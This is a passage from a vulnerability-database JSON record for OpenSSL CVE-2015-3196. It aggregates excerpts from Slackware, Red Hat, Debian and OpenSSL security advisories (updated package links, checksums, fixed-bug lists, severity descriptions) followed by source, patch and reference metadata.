13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zh-i486-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zh-i486-1_slack13.37.txz\n\nUpdated packages for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zh-x86_64-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zh-x86_64-1_slack13.37.txz\n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1q-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1q-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1q-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1q-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1q-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1q-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1q-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1q-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.2e-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.2e-i586-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.2e-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.2e-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 packages:\n5e45a22283b41aaf4f867918746ebc1d  openssl-0.9.8zh-i486-1_slack13.0.txz\n0ad74b36ce143d28e15dfcfcf1fcb483  openssl-solibs-0.9.8zh-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 packages:\nc360d323a2bed57c62d6699b2d4be65e  openssl-0.9.8zh-x86_64-1_slack13.0.txz\n122240badbfbe51c842a9102d3cfe30f  openssl-solibs-0.9.8zh-x86_64-1_slack13.0.txz\n\nSlackware 13.1 packages:\n1bf98b27573b20a7de5f6359f3eadbd7  openssl-0.9.8zh-i486-1_slack13.1.txz\n2b732f1f29de1cb6078fd1ddda8eb9ec  openssl-solibs-0.9.8zh-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 packages:\n735c3bbc55902ec57e46370cde32ea4b  openssl-0.9.8zh-x86_64-1_slack13.1.txz\n483f506f3b86572e60fe4c46a67c226b  openssl-solibs-0.9.8zh-x86_64-1_slack13.1.txz\n\nSlackware 13.37 packages:\n9af41ba336c64b92d5bbd86c17a93e94  openssl-0.9.8zh-i486-1_slack13.37.txz\nb83170b9c5ec56b4e2dc882b3c64b306  openssl-solibs-0.9.8zh-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 packages:\n2220ff161d0bf3635d2dea7caae6e5e7  openssl-0.9.8zh-x86_64-1_slack13.37.txz\n17b3e8884f383e3327d5e4a6080634cb  openssl-solibs-0.9.8zh-x86_64-1_slack13.37.txz\n\nSlackware 14.0 packages:\nced42bc3799f2b54aeb3b631a2864b90  openssl-1.0.1q-i486-1_slack14.0.txz\n52965f98ee30e8f3d22bde6b0fe7f53b  openssl-solibs-1.0.1q-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\ncbf49f09bdcebc61cf7fcb2857dc3a71  openssl-1.0.1q-x86_64-1_slack14.0.txz\n156911f58b71ee6369467d8fec34a59f  openssl-solibs-1.0.1q-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\n36d5f60b634788d4315ffb46ef6d4d88  openssl-1.0.1q-i486-1_slack14.1.txz\nfc18f566a9a2f5c6adb15d288245403a  openssl-solibs-1.0.1q-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\n03f1832417a79f73b35180a39ae4fb16  openssl-1.0.1q-x86_64-1_slack14.1.txz\nbf447792f23deb14e1fe3f008a6b78a7  openssl-solibs-1.0.1q-x86_64-1_slack14.1.txz\n\nSlackware -current packages:\n27b2974199a970392ed2192bf4a207a9  a/openssl-solibs-1.0.2e-i586-1.txz\n940a7653a6cadb44ce143d3b0e0eaa16  n/openssl-1.0.2e-i586-1.txz\n\nSlackware x86_64 -current packages:\n8636a45f49d186d505b356b9be66309b  a/openssl-solibs-1.0.2e-x86_64-1.txz\n87c33a76a94993864a52bfe4e5d5b2f0  n/openssl-1.0.2e-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg openssl-1.0.1q-i486-1_slack14.1.txz openssl-solibs-1.0.1q-i486-1_slack14.1.txz \n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list:                          |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message:                                                     |\n|                                                                        |\n|   unsubscribe slackware-security                                       |\n|                                                                        |\n| You will get a confirmation message back containing instructions to    |\n| complete the process.  Please do not reply to this email address. Description:\n\nThis release of Red Hat JBoss Core Services httpd 2.4.23 serves as a\nreplacement for JBoss Core Services Apache HTTP Server 2.4.6. (CVE-2014-8176,\nCVE-2015-0209, CVE-2015-0286, CVE-2015-3194, CVE-2015-3195, CVE-2015-3196,\nCVE-2015-3216, CVE-2016-0702, CVE-2016-0705, CVE-2016-0797, CVE-2016-0799,\nCVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-2108, CVE-2016-2109,\nCVE-2016-2177, CVE-2016-2178, CVE-2016-2842)\n\n* This update fixes several flaws in libxml2. (CVE-2016-1762,\nCVE-2016-1833, CVE-2016-1834, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837,\nCVE-2016-1838, CVE-2016-1839, CVE-2016-1840, CVE-2016-3627, CVE-2016-3705,\nCVE-2016-4447, CVE-2016-4448, CVE-2016-4449, CVE-2016-4483)\n\n* This update fixes three flaws in curl. (CVE-2016-5419, CVE-2016-5420,\nCVE-2016-7141)\n\n* This update fixes two flaws in httpd. (CVE-2014-3523, CVE-2015-3185)\n\n* This update fixes two flaws in mod_cluster. (CVE-2016-4459,\nCVE-2016-8612)\n\n* A buffer overflow flaw when concatenating virtual host names and URIs was\nfixed in mod_jk. (CVE-2012-1148)\n\nRed Hat would like to thank the OpenSSL project for reporting\nCVE-2014-8176, CVE-2015-0286, CVE-2016-2108, CVE-2016-2105, CVE-2016-2106,\nCVE-2016-2107, CVE-2016-0702, CVE-2016-0705, CVE-2016-0797, CVE-2016-0799,\nand CVE-2016-2842. Upstream acknowledges Stephen Henson (OpenSSL development team)\nas the original reporter of CVE-2015-0286; Huzaifa Sidhpurwala (Red Hat),\nHanno BAPck, and David Benjamin (Google) as the original reporters of\nCVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2105,\nCVE-2016-2106, CVE-2016-0797, CVE-2016-0799, and CVE-2016-2842; Juraj\nSomorovsky as the original reporter of CVE-2016-2107; Yuval Yarom\n(University of Adelaide and NICTA), Daniel Genkin (Technion and Tel Aviv\nUniversity), and Nadia Heninger (University of Pennsylvania) as the\noriginal reporters of CVE-2016-0702; and Adam Langley (Google/BoringSSL) as\nthe original reporter of CVE-2016-0705. \n\nSee the corresponding CVE pages linked to in the References section for\nmore information about each of the flaws listed in this advisory. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). Before applying the update, back up your\nexisting Red Hat JBoss Web Server installation (including all applications\nand configuration files). \n\nAfter installing the updated packages, the httpd daemon will be restarted\nautomatically. Bugs fixed (https://bugzilla.redhat.com/):\n\n801648 - CVE-2012-1148 expat: Memory leak in poolGrow\n1121519 - CVE-2014-3523 httpd: WinNT MPM denial of service\n1196737 - CVE-2015-0209 openssl: use-after-free on invalid EC private key import\n1202366 - CVE-2015-0286 openssl: invalid pointer use in ASN1_TYPE_cmp()\n1227574 - CVE-2015-3216 openssl: Crash in ssleay_rand_bytes due to locking regression\n1228611 - CVE-2014-8176 OpenSSL: Invalid free in DTLS\n1243888 - CVE-2015-3185 httpd: ap_some_auth_required() does not properly indicate authenticated request in 2.4\n1288320 - CVE-2015-3194 OpenSSL: Certificate verify crash with missing PSS parameter\n1288322 - CVE-2015-3195 OpenSSL: X509_ATTRIBUTE memory leak\n1288326 - CVE-2015-3196 OpenSSL: Race condition handling PSK identify hint\n1310596 - CVE-2016-0705 OpenSSL: Double-free in DSA code\n1310599 - CVE-2016-0702 OpenSSL: Side channel attack on modular exponentiation\n1311880 - CVE-2016-0797 OpenSSL: BN_hex2bn/BN_dec2bn NULL pointer deref/heap corruption\n1312219 - CVE-2016-0799 OpenSSL: Fix memory issues in BIO_*printf functions\n1314757 - CVE-2016-2842 openssl: doapr_outch function does not verify that certain memory allocation succeeds\n1319829 - CVE-2016-3627 libxml2: stack exhaustion while parsing xml files in recovery mode\n1330101 - CVE-2016-2109 openssl: ASN.1 BIO handling of large amounts of data\n1331402 - CVE-2016-2108 openssl: Memory corruption in the ASN.1 encoder\n1331426 - CVE-2016-2107 openssl: Padding oracle in AES-NI CBC MAC check\n1331441 - CVE-2016-2105 openssl: EVP_EncodeUpdate overflow\n1331536 - CVE-2016-2106 openssl: EVP_EncryptUpdate overflow\n1332443 - CVE-2016-3705 libxml2: stack overflow before detecting invalid XML file\n1332820 - CVE-2016-4483 libxml2: out-of-bounds read\n1338682 - CVE-2016-1833 libxml2: Heap-based buffer overread in htmlCurrentChar\n1338686 - CVE-2016-4447 libxml2: Heap-based buffer underreads due to xmlParseName\n1338691 - CVE-2016-1835 libxml2: Heap use-after-free in xmlSAX2AttributeNs\n1338696 - CVE-2016-1837 libxml2: Heap use-after-free in htmlPArsePubidLiteral and htmlParseSystemiteral\n1338700 - CVE-2016-4448 libxml2: Format string vulnerability\n1338701 - CVE-2016-4449 libxml2: Inappropriate fetch of entities content\n1338702 - CVE-2016-1836 libxml2: Heap use-after-free in xmlDictComputeFastKey\n1338703 - CVE-2016-1839 libxml2: Heap-based buffer overread in xmlDictAddString\n1338705 - CVE-2016-1838 libxml2: Heap-based buffer overread in xmlPArserPrintFileContextInternal\n1338706 - CVE-2016-1840 libxml2: Heap-buffer-overflow in xmlFAParserPosCharGroup\n1338708 - CVE-2016-1834 libxml2: Heap-buffer-overflow in xmlStrncat\n1338711 - CVE-2016-1762 libxml2: Heap-based buffer-overread in xmlNextChar\n1341583 - CVE-2016-4459 mod_cluster: Buffer overflow in mod_manager when sending request with long JVMRoute\n1341705 - CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase\n1343400 - CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation\n1362183 - CVE-2016-5419 curl: TLS session resumption client cert bypass\n1362190 - CVE-2016-5420 curl: Re-using connection with wrong client cert\n1373229 - CVE-2016-7141 curl: Incorrect reuse of client certificates\n1382352 - CVE-2016-6808 mod_jk: Buffer overflow when concatenating virtual host name and URI\n1387605 - CVE-2016-8612 JBCS mod_cluster: Protocol parsing logic error\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nJBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0]\nJBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service\n\n6. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 1.0.1e-2+deb7u18. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1.0.1k-3+deb8u2. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.0.2e-1 or earlier. \n\nNOTE: WE ANTICIPATE THAT 1.0.0t AND 0.9.8zh WILL BE THE LAST RELEASES FOR THE\n0.9.8 AND 1.0.0 VERSIONS AND THAT NO MORE SECURITY FIXES WILL BE PROVIDED (AS\nPER PREVIOUS ANNOUNCEMENTS). USERS ARE ADVISED TO UPGRADE TO LATER VERSIONS. \n\nBN_mod_exp may produce incorrect results on x86_64 (CVE-2015-3193)\n==================================================================\n\nSeverity: Moderate\n\nThere is a carry propagating bug in the x86_64 Montgomery squaring procedure. No\nEC algorithms are affected. Analysis suggests that attacks against RSA and DSA\nas a result of this defect would be very difficult to perform and are not\nbelieved likely. Attacks against DH are considered just feasible (although very\ndifficult) because most of the work necessary to deduce information\nabout a private key may be performed offline. The amount of resources\nrequired for such an attack would be very significant and likely only\naccessible to a limited number of attackers. An attacker would\nadditionally need online access to an unpatched system using the target\nprivate key in a scenario with persistent DH parameters and a private\nkey that is shared between multiple clients. For example this can occur by\ndefault in OpenSSL DHE based SSL/TLS ciphersuites. \n\nThis issue affects OpenSSL version 1.0.2. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2e\n\nThis issue was reported to OpenSSL on August 13 2015 by Hanno\nB\u00f6ck. The fix was developed by Andy Polyakov of the OpenSSL\ndevelopment team. \n\nCertificate verify crash with missing PSS parameter (CVE-2015-3194)\n===================================================================\n\nSeverity: Moderate\n\nThe signature verification routines will crash with a NULL pointer dereference\nif presented with an ASN.1 signature using the RSA PSS algorithm and absent\nmask generation function parameter. Since these routines are used to verify\ncertificate signature algorithms this can be used to crash any certificate\nverification operation and exploited in a DoS attack. \n\nThis issue affects OpenSSL versions 1.0.2 and 1.0.1. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2e\nOpenSSL 1.0.1 users should upgrade to 1.0.1q\n\nThis issue was reported to OpenSSL on August 27 2015 by Lo\u00efc Jonas Etienne\n(Qnective AG). The fix was developed by Dr. Stephen Henson of the OpenSSL\ndevelopment team. This structure is used by the PKCS#7 and CMS routines so any\napplication which reads PKCS#7 or CMS data from untrusted sources is affected. \nSSL/TLS is not affected. \n\nThis issue affects OpenSSL versions 1.0.2 and 1.0.1, 1.0.0 and 0.9.8. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2e\nOpenSSL 1.0.1 users should upgrade to 1.0.1q\nOpenSSL 1.0.0 users should upgrade to 1.0.0t\nOpenSSL 0.9.8 users should upgrade to 0.9.8zh\n\nThis issue was reported to OpenSSL on November 9 2015 by Adam Langley\n(Google/BoringSSL) using libFuzzer. The fix was developed by Dr. Stephen\nHenson of the OpenSSL development team. \n\nThis issue was fixed in OpenSSL 1.0.2d and 1.0.1p but has not been previously\nlisted in an OpenSSL security advisory. This issue also affects OpenSSL 1.0.0\nand has not been previously fixed in an OpenSSL 1.0.0 release. \n\nThe fix was developed by Dr. Stephen Henson of the OpenSSL development team. \n\nAnon DH ServerKeyExchange with 0 p parameter (CVE-2015-1794)\n============================================================\n\nSeverity: Low\n\nIf a client receives a ServerKeyExchange for an anonymous DH ciphersuite with\nthe value of p set to 0 then a seg fault can occur leading to a possible denial\nof service attack. \n\nThis issue affects OpenSSL version 1.0.2. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2e\n\nThis issue was reported to OpenSSL on August 3 2015 by Guy Leaver (Cisco). The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nNote\n====\n\nAs per our previous announcements and our Release Strategy\n(https://www.openssl.org/about/releasestrat.html), support for OpenSSL versions\n1.0.0 and 0.9.8 will cease on 31st December 2015. No security updates for these\nversions will be provided after that date. In the absence of significant\nsecurity issues being identified prior to that date, the 1.0.0t and 0.9.8zh\nreleases will be the last for those versions. Users of these versions are\nadvised to upgrade. \n\n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv/20151203.txt\n\nNote: the online version of the advisory may be updated with additional\ndetails over time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/about/secpolicy.html\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-3196"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006117"
      },
      {
        "db": "BID",
        "id": "78622"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-3196"
      },
      {
        "db": "PACKETSTORM",
        "id": "134652"
      },
      {
        "db": "PACKETSTORM",
        "id": "141239"
      },
      {
        "db": "PACKETSTORM",
        "id": "134782"
      },
      {
        "db": "PACKETSTORM",
        "id": "134859"
      },
      {
        "db": "PACKETSTORM",
        "id": "140182"
      },
      {
        "db": "PACKETSTORM",
        "id": "134632"
      },
      {
        "db": "PACKETSTORM",
        "id": "169632"
      }
    ],
    "trust": 2.61
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2015-3196",
        "trust": 3.5
      },
      {
        "db": "BID",
        "id": "78622",
        "trust": 2.0
      },
      {
        "db": "JUNIPER",
        "id": "JSA10761",
        "trust": 2.0
      },
      {
        "db": "SECTRACK",
        "id": "1034294",
        "trust": 1.7
      },
      {
        "db": "JUNIPER",
        "id": "JSA10759",
        "trust": 1.7
      },
      {
        "db": "PULSESECURE",
        "id": "SA40100",
        "trust": 1.7
      },
      {
        "db": "SIEMENS",
        "id": "SSA-412672",
        "trust": 1.7
      },
      {
        "db": "JVN",
        "id": "JVNVU95113540",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006117",
        "trust": 0.8
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.0696",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-076",
        "trust": 0.6
      },
      {
        "db": "MCAFEE",
        "id": "SB10203",
        "trust": 0.3
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-22-349-21",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-3196",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134652",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "141239",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134782",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134859",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "140182",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134632",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "169632",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-3196"
      },
      {
        "db": "BID",
        "id": "78622"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006117"
      },
      {
        "db": "PACKETSTORM",
        "id": "134652"
      },
      {
        "db": "PACKETSTORM",
        "id": "141239"
      },
      {
        "db": "PACKETSTORM",
        "id": "134782"
      },
      {
        "db": "PACKETSTORM",
        "id": "134859"
      },
      {
        "db": "PACKETSTORM",
        "id": "140182"
      },
      {
        "db": "PACKETSTORM",
        "id": "134632"
      },
      {
        "db": "PACKETSTORM",
        "id": "169632"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-076"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-3196"
      }
    ]
  },
  "id": "VAR-201512-0485",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.43503637333333334
  },
  "last_update_date": "2024-07-23T21:00:45.295000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "OpenSSL 1.0.2 Series Release Notes",
        "trust": 0.8,
        "url": "https://www.openssl.org/news/openssl-1.0.2-notes.html"
      },
      {
        "title": "OpenSSL 1.0.1 Series Release Notes",
        "trust": 0.8,
        "url": "https://www.openssl.org/news/openssl-1.0.1-notes.html"
      },
      {
        "title": "OpenSSL 1.0.0 Series Release Notes",
        "trust": 0.8,
        "url": "https://www.openssl.org/news/openssl-1.0.0-notes.html"
      },
      {
        "title": "Release Strategy",
        "trust": 0.8,
        "url": "https://www.openssl.org/policies/releasestrat.html"
      },
      {
        "title": "Fix PSK handling.",
        "trust": 0.8,
        "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=3c66a669dfc7b3792f7af0758ea26fe8502ce70c"
      },
      {
        "title": "Race condition handling PSK identify hint (CVE-2015-3196)",
        "trust": 0.8,
        "url": "http://openssl.org/news/secadv/20151203.txt"
      },
      {
        "title": "Oracle Critical Patch Update Advisory - April 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html"
      },
      {
        "title": "Oracle Critical Patch Update CVSS V2 Risk Matrices - April 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2016-2881694.html"
      },
      {
        "title": "Text Form of Oracle Critical Patch Update - April 2016 Risk Matrices",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2016verbose-2881709.html"
      },
      {
        "title": "Oracle Solaris Third Party Bulletin - January 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html"
      },
      {
        "title": "April 2016 Critical Patch Update Released",
        "trust": 0.8,
        "url": "https://blogs.oracle.com/security/entry/april_2016_critical_patch_update"
      },
      {
        "title": "OpenSSL Remediation measures for denial of service vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=58938"
      },
      {
        "title": "Red Hat: Moderate: openssl security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152617 - security advisory"
      },
      {
        "title": "Red Hat: CVE-2015-3196",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-3196"
      },
      {
        "title": "Debian Security Advisories: DSA-3413-1 openssl -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=82bedc073c0f22b408ebaf092ed8621c"
      },
      {
        "title": "Ubuntu Security Notice: openssl vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2830-1"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2015-614",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-614"
      },
      {
        "title": "Forcepoint Security Advisories: CVE-2015-3194, 3195, 3196 -- Security Vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=forcepoint_security_advisories\u0026qid=62ab21cc073446940abce12c35db3049"
      },
      {
        "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP 2.4.23 Release",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162957 - security advisory"
      },
      {
        "title": "Cisco: Multiple Vulnerabilities in OpenSSL (December 2015) Affecting Cisco Products",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20151204-openssl"
      },
      {
        "title": "Symantec Security Advisories: SA105 : OpenSSL Vulnerabilities 3-Dec-2015",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=a924415f718a299b2d1e8046890941f3"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - April 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=122319027ae43d6d626710f1b1bb1d43"
      },
      {
        "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2015",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=435ed9abc2fb1e74ce2a69605a01e326"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a"
      },
      {
        "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - January 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=eb439566c9130adc92d21bc093204cf8"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2015-3196 "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-3196"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006117"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-076"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-362",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006117"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-3196"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.3,
        "url": "http://www.debian.org/security/2015/dsa-3413"
      },
      {
        "trust": 2.1,
        "url": "http://openssl.org/news/secadv/20151203.txt"
      },
      {
        "trust": 2.0,
        "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html"
      },
      {
        "trust": 2.0,
        "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html"
      },
      {
        "trust": 2.0,
        "url": "http://www.fortiguard.com/advisory/openssl-advisory-december-2015"
      },
      {
        "trust": 1.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-2617.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.ubuntu.com/usn/usn-2830-1"
      },
      {
        "trust": 1.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2957.html"
      },
      {
        "trust": 1.7,
        "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40100"
      },
      {
        "trust": 1.7,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?l=bugtraq\u0026m=145382583417444\u0026w=2"
      },
      {
        "trust": 1.7,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04944173"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/78622"
      },
      {
        "trust": 1.7,
        "url": "http://fortiguard.com/advisory/openssl-advisory-december-2015"
      },
      {
        "trust": 1.7,
        "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20151204-openssl"
      },
      {
        "trust": 1.7,
        "url": "http://www.slackware.com/security/viewer.php?l=slackware-security\u0026y=2015\u0026m=slackware-security.754583"
      },
      {
        "trust": 1.7,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-december/173801.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-updates/2015-12/msg00070.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-updates/2015-12/msg00071.html"
      },
      {
        "trust": 1.7,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759"
      },
      {
        "trust": 1.7,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10761"
      },
      {
        "trust": 1.7,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05398322"
      },
      {
        "trust": 1.7,
        "url": "http://www.securitytracker.com/id/1034294"
      },
      {
        "trust": 1.7,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf"
      },
      {
        "trust": 1.7,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html"
      },
      {
        "trust": 1.1,
        "url": "https://git.openssl.org/?p=openssl.git%3ba=commit%3bh=3c66a669dfc7b3792f7af0758ea26fe8502ce70c"
      },
      {
        "trust": 0.9,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3196"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/vu/jvnvu95113540/"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-3196"
      },
      {
        "trust": 0.7,
